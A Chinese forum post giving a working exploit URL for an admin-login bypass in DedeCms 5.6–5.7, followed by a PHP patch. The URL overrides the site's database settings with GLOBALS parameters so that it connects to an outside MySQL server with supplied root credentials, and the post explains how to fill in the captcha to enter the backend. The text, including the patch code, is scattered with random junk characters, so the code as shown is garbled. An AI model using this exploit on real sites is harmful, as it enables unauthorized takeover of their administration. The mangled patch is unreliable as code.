最近看过此主题的会员

返回列表 发帖
织梦(DedeCms) v5.6-5.7 越权访问漏洞
http://www.XXXX.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

+ ~1 y; i+ g" s* ~
把上面validate=dcug改为当前的验证码,即可直接进入网站后台

4 u$ Z- s! L7 W4 Z7 ~1 F4 t) Q
此漏洞的前提是必须得到后台路径才能实现

9 Y$ [+ o  T. _7 Q# @( U
官方临时解决办法:

8 y0 D, x5 C5 P0 ]! F1 f
找到include/common.inc.php文件,把:
" ~& R- I' M7 N$ }
    foreach($_REQUEST as $_k=>$_v)
( m/ A+ i5 b& s: \; q2 l    {; W. x1 [! D7 N7 _5 M9 [% T
        var_dump($_k);
7 S" s+ o* Y" x' P3 b# I. J        if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )
! ~% e* F: G" G        {
% Y! |( Y' S( U            exit('Request var not allow!');" B. |, a1 B8 {. b! v6 F
        }
' e# t/ [" \1 G, J& w! U! C    }

8 L! s- J( p6 m) p( A$ h: T% H# Q- R# h
换成:

% V/ s9 k3 k% C% w9 E4 y
    //检查和注册外部提交的变量
# D5 o+ d6 ]+ l3 s' k8 r2 ]6 {$ \1 |8 u8 {    function CheckRequest(&$val) {
' r2 Q; e% A; \. T. l) G3 W        if (is_array($val)) {
7 {& e2 ^: Y& c            foreach ($val as $_k=>$_v) {
: z3 d7 v/ a1 Q" K                CheckRequest($_k);
9 @8 S! Q4 p0 O- z/ Q                CheckRequest($val[$_k]);
8 |! ]% r, `) C. O. ^! I            }6 h) [( f2 h- E' v8 i
        } else# R' R" ^0 @8 w7 J9 J4 \  a+ ~
        {/ E! h8 N6 M7 p
            if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
2 O& v: ~8 |2 a3 j( S, `, s4 M            {
7 k! L+ H7 }  {* H1 E/ d2 T                exit('Request var not allow!');9 N. T% K( t9 f5 J2 Y3 _& {
            }
- Q. P) z  G! Q! S! s5 P7 o        }
7 I! p2 ]& M3 Z9 m1 f    }( k% ?( ~" x" |( k1 z
    CheckRequest($_REQUEST);# D  c( p* ?0 W9 L2 B/ J

0 i: z4 v! k8 X
- U# Q# ]' |+ q: R, X% U  \$ g6 y4 d0 E: ?
: R# x! j, g0 s0 X
& v9 \1 L: Q+ x6 a, G% w) N% a" e

7 i& ], o4 L! r' r! ]+ j+ U, g% |8 H7 t. c2 s3 ^* ?

7 u: {+ l1 ~% }1 K
0 o  y9 J& W  y$ U9 Z$ M7 o) z) C9 o, Z

: {5 B% A! z" K' ]0 p% O
3 T$ a! P4 x9 R# p7 B* w  c, k( L% V' R1 P$ [0 o$ p8 y6 J) f

+ J! ^3 a6 s9 G
% |7 Z4 k2 b% t* X6 m3 ]2 X- s0 K" q: k! X. O
& ~1 Q( t3 F) r- A) y6 G

/ S- \8 i% g$ S! @* ?4 k4 j3 k9 k9 n1 U! e" F1 l, L: c
公告:https://www.sitedirsec.com公布最新漏洞,请关注

 

您可能还想看的主题:

启明星辰招聘

TOP

返回列表